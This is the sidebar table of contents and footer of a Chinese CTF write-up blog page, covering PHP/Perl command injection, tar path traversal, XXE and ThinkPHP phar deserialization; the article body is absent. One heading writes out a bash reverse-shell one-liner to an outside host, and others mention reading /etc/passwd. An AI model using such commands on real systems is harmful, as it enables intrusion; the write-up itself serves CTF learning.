      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#大家自己体验一波，不过还是把学到的东西总结一下。"><span class="nav-number">1.0.0.1.</span> <span class="nav-text">大家自己体验一波，不过还是把学到的东西总结一下。</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#0x01-untar"><span class="nav-number">1.0.1.</span> <span class="nav-text">0x01 untar</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#题目给了源码："><span class="nav-number">1.0.1.1.</span> <span class="nav-text">题目给了源码：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#于是去搜索了一波。"><span class="nav-number">1.0.1.2.</span> <span class="nav-text">于是去搜索了一波。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#原题是HITCON-2017，这段代码先通过XFF判断用户的ip，建立沙盒，并且通过GET传入url和filename两个参数，通过filename建立新的目录以及文件名，通过url进行shell-exec的GET命令执行，最终把执行结果放在新生成的目录下的文件名。"><span class="nav-number">1.0.1.3.</span> <span class="nav-text">原题是HITCON 2017，这段代码先通过XFF判断用户的ip，建立沙盒，并且通过GET传入url和filename两个参数，通过filename建立新的目录以及文件名，通过url进行shell_exec的GET命令执行，最终把执行结果放在新生成的目录下的文件名。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#里面有几个关键的函数我们先来了解一下。"><span class="nav-number">1.0.1.4.</span> <span class="nav-text">里面有几个关键的函数我们先来了解一下。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#首先来研究一下pathinfo函数以及basename函数的机制。"><span class="nav-number">1.0.1.5.</span> <span class="nav-text">首先来研究一下pathinfo函数以及basename函数的机制。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#下面是pathinfo的测试代码："><span class="nav-number">1.0.1.6.</span> <span class="nav-text">下面是pathinfo的测试代码：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#结果如下："><span class="nav-number">1.0.1.7.</span> <span class="nav-text">结果如下：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#basename-函数返回路径中的文件名部分，如下测试代码："><span class="nav-number">1.0.1.8.</span> <span class="nav-text">basename()函数返回路径中的文件名部分，如下测试代码：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#运行的结果如下："><span class="nav-number">1.0.1.9.</span> <span class="nav-text">运行的结果如下：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#代码对于要建立的目录都会两边basename，如下代码："><span class="nav-number">1.0.1.10.</span> <span class="nav-text">代码对于要建立的目录都会两边basename，如下代码：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#测试的地址参数："><span class="nav-number">1.0.1.11.</span> <span class="nav-text">测试的地址参数：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#测试的结果如下："><span class="nav-number">1.0.1.12.</span> <span class="nav-text">测试的结果如下：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#如果filename为-a或者a这样的形式，basename-info-39-basename-39-肯定为a的，此时的目录为当前目录，再次用basename返回路径中的文件名肯定为空。如果a-xxx-，-c和-dir返回的都是a，解释一下原因：第一次返回的basename为a其实相当于-a，那么第二次再用basename返回的文件名肯定也是a。理解了之后题目就比较好做了。"><span class="nav-number">1.0.1.13.</span> <span class="nav-text">如果filename为/a或者a这样的形式，basename($info[&#39;basename&#39;]);肯定为a的，此时的目录为当前目录，再次用basename返回路径中的文件名肯定为空。如果a/xxx/，$c和$dir返回的都是a，解释一下原因：第一次返回的basename为a其实相当于./a，那么第二次再用basename返回的文件名肯定也是a。理解了之后题目就比较好做了。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#escapeshellarg与escapeshellcmd函数"><span class="nav-number">1.0.1.14.</span> <span class="nav-text">escapeshellarg与escapeshellcmd函数</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#escapeshellarg"><span class="nav-number">1.0.1.15.</span> <span class="nav-text">escapeshellarg</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#1-确保用户只能传递一个参数给命令。"><span class="nav-number">1.0.1.16.</span> <span class="nav-text">1. 确保用户只能传递一个参数给命令。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#2-用户不能指定更多的参数一个。"><span class="nav-number">1.0.1.17.</span> <span class="nav-text">2. 用户不能指定更多的参数一个。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#3-用户不能执行不同的命令。"><span class="nav-number">1.0.1.18.</span> <span class="nav-text">3. 用户不能执行不同的命令。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#就好比是我传入的ls，那么经过函数的操作后就变成了-39-ls-39-。同时会对传入的单引号进行一些安全处理，例如传入l-39-s就会变成-39-l-39-39-39-s-39-。"><span class="nav-number">1.0.1.19.</span> <span class="nav-text">就好比是我传入的ls，那么经过函数的操作后就变成了&#39;ls&#39;。同时会对传入的单引号进行一些安全处理，例如传入l&#39;s就会变成&#39;l&#39;\&#39;&#39;s&#39;。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#escapeshellcmd"><span class="nav-number">1.0.1.20.</span> <span class="nav-text">escapeshellcmd</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#1-确保用户只执行一个命令"><span class="nav-number">1.0.1.21.</span> <span class="nav-text">1.确保用户只执行一个命令</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#2-用户可以指定不限数量的参数"><span class="nav-number">1.0.1.22.</span> <span class="nav-text">2.用户可以指定不限数量的参数</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#3-用户不能执行不同的命令"><span class="nav-number">1.0.1.23.</span> <span class="nav-text">3.用户不能执行不同的命令</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#他的作用是将一些危险的符号进行转义，如："><span class="nav-number">1.0.1.24.</span> <span class="nav-text">他的作用是将一些危险的符号进行转义，如：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#对于orange师傅的原题是GET命令的漏洞。"><span class="nav-number">1.0.1.25.</span> <span class="nav-text">对于orange师傅的原题是GET命令的漏洞。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#根本的原因在于perl的GET函数的底层是调用open处理的，而在perl-中，open是可以执行系统命令的。"><span class="nav-number">1.0.1.26.</span> <span class="nav-text">根本的原因在于perl的GET函数的底层是调用open处理的，而在perl`中，open是可以执行系统命令的。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#例如下面的示例代码："><span class="nav-number">1.0.1.27.</span> <span class="nav-text">例如下面的示例代码：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#从这段命令我们可以看出来perl中的open的作用。同时open是支持file协议的。"><span class="nav-number">1.0.1.28.</span> <span class="nav-text">从这段命令我们可以看出来perl中的open的作用。同时open是支持file协议的。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#尝试一下file协议读取GEt-39-file-etc-passwd-39-或者GET-39-etc-passwd-39-，都可以成功读取文件内容。下面可以执行系统命令。"><span class="nav-number">1.0.1.29.</span> <span class="nav-text">尝试一下file协议读取GEt &#39;file:/etc/passwd&#39;或者GET &#39;/etc/passwd&#39;，都可以成功读取文件内容。下面可以执行系统命令。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#通过以上命令成功执行，这里需要注意的是要有存在的文件名才能成功执行命令，所以新建了一个ls-文件。"><span class="nav-number">1.0.1.30.</span> <span class="nav-text">通过以上命令成功执行，这里需要注意的是要有存在的文件名才能成功执行命令，所以新建了一个ls|文件。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#orange的原题我们可以建立执行的文件名，再通过file协议去执行就可以了。"><span class="nav-number">1.0.1.31.</span> <span class="nav-text">orange的原题我们可以建立执行的文件名，再通过file协议去执行就可以了。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#首先先看一下目录。"><span class="nav-number">1.0.1.32.</span> <span class="nav-text">首先先看一下目录。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#通过Payload-url-amp-filename-xxx，访问沙盒里面的xxx文件。"><span class="nav-number">1.0.1.33.</span> <span class="nav-text">通过Payload url=/&amp;filename=xxx，访问沙盒里面的xxx文件。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#发现flag和readflag，flag是空的，readflag是一个二进制文件，需要通过执行readflag来读取flag。"><span class="nav-number">1.0.1.34.</span> <span class="nav-text">发现flag和readflag，flag是空的，readflag是一个二进制文件，需要通过执行readflag来读取flag。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#构造文件名bash-c-readflag，通过如下payload"><span class="nav-number">1.0.1.35.</span> <span class="nav-text">构造文件名bash -c /readflag，通过如下payload</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#访问沙盒下的a可以得到flag（这里的-etc-passwd的目的只是为了让我的GET命令请求快点"><span class="nav-number">1.0.1.36.</span> <span class="nav-text">访问沙盒下的a可以得到flag（这里的/etc/passwd的目的只是为了让我的GET命令请求快点)</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#第二种方法可以利用反弹shell"><span class="nav-number">1.0.1.37.</span> <span class="nav-text">第二种方法可以利用反弹shell</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#同样需要在你的vps上放一下一句话反弹bash。"><span class="nav-number">1.0.1.38.</span> <span class="nav-text">同样需要在你的vps上放一下一句话反弹bash。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#但是上面的这题限制了只能是http或者https，并且过滤了-。"><span class="nav-number">1.0.1.39.</span> <span class="nav-text">但是上面的这题限制了只能是http或者https，并且过滤了|。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#因此上面的方式全部失效了。但是我们注意到了最后一句。"><span class="nav-number">1.0.1.40.</span> <span class="nav-text">因此上面的方式全部失效了。但是我们注意到了最后一句。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#搜索发现https-bugs-debian-org-cgi-bin-bugreport-cgi-bug-900834。这是一个perl的目录穿梭漏洞。"><span class="nav-number">1.0.1.41.</span> <span class="nav-text">搜索发现https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=900834。这是一个perl的目录穿梭漏洞。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#这个是比较详细的介绍http-knqyf263-hatenablog-com-entry-2018-06-27-181037"><span class="nav-number">1.0.1.42.</span> <span class="nav-text">这个是比较详细的介绍http://knqyf263.hatenablog.com/entry/2018/06/27/181037</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#上面会把文件解压到当前的文件夹中。"><span class="nav-number">1.0.1.43.</span> <span class="nav-text">上面会把文件解压到当前的文件夹中。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#如下实验："><span class="nav-number">1.0.1.44.</span> <span class="nav-text">如下实验：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#因此可以这样构造："><span class="nav-number">1.0.1.45.</span> <span class="nav-text">因此可以这样构造：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#同时我们还可以使用这个来归档为同名文件"><span class="nav-number">1.0.1.46.</span> <span class="nav-text">同时我们还可以使用这个来归档为同名文件</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#然后通过访问包含我们的b-tar"><span class="nav-number">1.0.1.47.</span> <span class="nav-text">然后通过访问包含我们的b.tar</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#然后在沙盒中可以看到b-tar文件。"><span class="nav-number">1.0.1.48.</span> <span class="nav-text">然后在沙盒中可以看到b.tar文件。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#然后再通过包含sandbox的文件来rce。"><span class="nav-number">1.0.1.49.</span> <span class="nav-text">然后再通过包含sandbox的文件来rce。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#最后我们访问"><span class="nav-number">1.0.1.50.</span> <span class="nav-text">最后我们访问</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#拿到flag如下："><span class="nav-number">1.0.1.51.</span> <span class="nav-text">拿到flag如下：</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#0x02-Ticket-system-12end师傅"><span class="nav-number">1.0.2.</span> <span class="nav-text">0x02 Ticket_system[12end师傅]</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#题目描述："><span class="nav-number">1.0.2.1.</span> <span class="nav-text">题目描述：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#1-首先题目有个文件上传的点，然后有个可以提交xml的地方。那么我们就可以通过这两个点了展开我们的攻击。"><span class="nav-number">1.0.2.2.</span> <span class="nav-text">1. 首先题目有个文件上传的点，然后有个可以提交xml的地方。那么我们就可以通过这两个点了展开我们的攻击。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#2-现在我们先尝试一下xxe："><span class="nav-number">1.0.2.3.</span> <span class="nav-text">2. 现在我们先尝试一下xxe：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#可以看到成功的读取了本地文件。"><span class="nav-number">1.0.2.4.</span> <span class="nav-text">可以看到成功的读取了本地文件。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#我们通过读取源码发现是thinkPhp的空架版本是5-2-0，通过搜索找到了Smile的一个5-2-x的版本的反序列化链，下面是payload"><span class="nav-number">1.0.2.5.</span> <span class="nav-text">我们通过读取源码发现是thinkPhp的空架版本是5.2.0，通过搜索找到了Smile的一个5.2.x的版本的反序列化链，下面是payload:</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#我们配合phar-反序列化进行rce。"><span class="nav-number">1.0.2.6.</span> <span class="nav-text">我们配合phar://反序列化进行rce。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#将sleep-100改成bash-c-39-bash-i-gt-dev-tcp-1-1-1-1-4444-0-gt-amp-1-39-，然后在自己的服务器监听一下。就可以反弹shell了。"><span class="nav-number">1.0.2.7.</span> <span class="nav-text">将sleep 100改成bash -c &#39;bash -i &gt;/dev/tcp/1.1.1.1/4444 0&gt;&amp;1&#39;，然后在自己的服务器监听一下。就可以反弹shell了。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#getshell后发现并不能读取flag文件由于对www-data有权限的设置，但是在根目录下有一个readflag的二进制文件，但是执行它会出现一个随机计算的式子，由于nc这样的shell不能交互，但是上面有php和perl的环境那么我们可以上传文件去执行建立交互。从从而获得flag。"><span class="nav-number">1.0.2.8.</span> <span class="nav-text">getshell后发现并不能读取flag文件由于对www-data有权限的设置，但是在根目录下有一个readflag的二进制文件，但是执行它会出现一个随机计算的式子，由于nc这样的shell不能交互，但是上面有php和perl的环境那么我们可以上传文件去执行建立交互。从从而获得flag。</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#自己写的："><span class="nav-number">1.0.2.9.</span> <span class="nav-text">自己写的：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#运行的结果："><span class="nav-number">1.0.2.10.</span> <span class="nav-text">运行的结果：</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ljdd520</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">176.7k</span>
  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
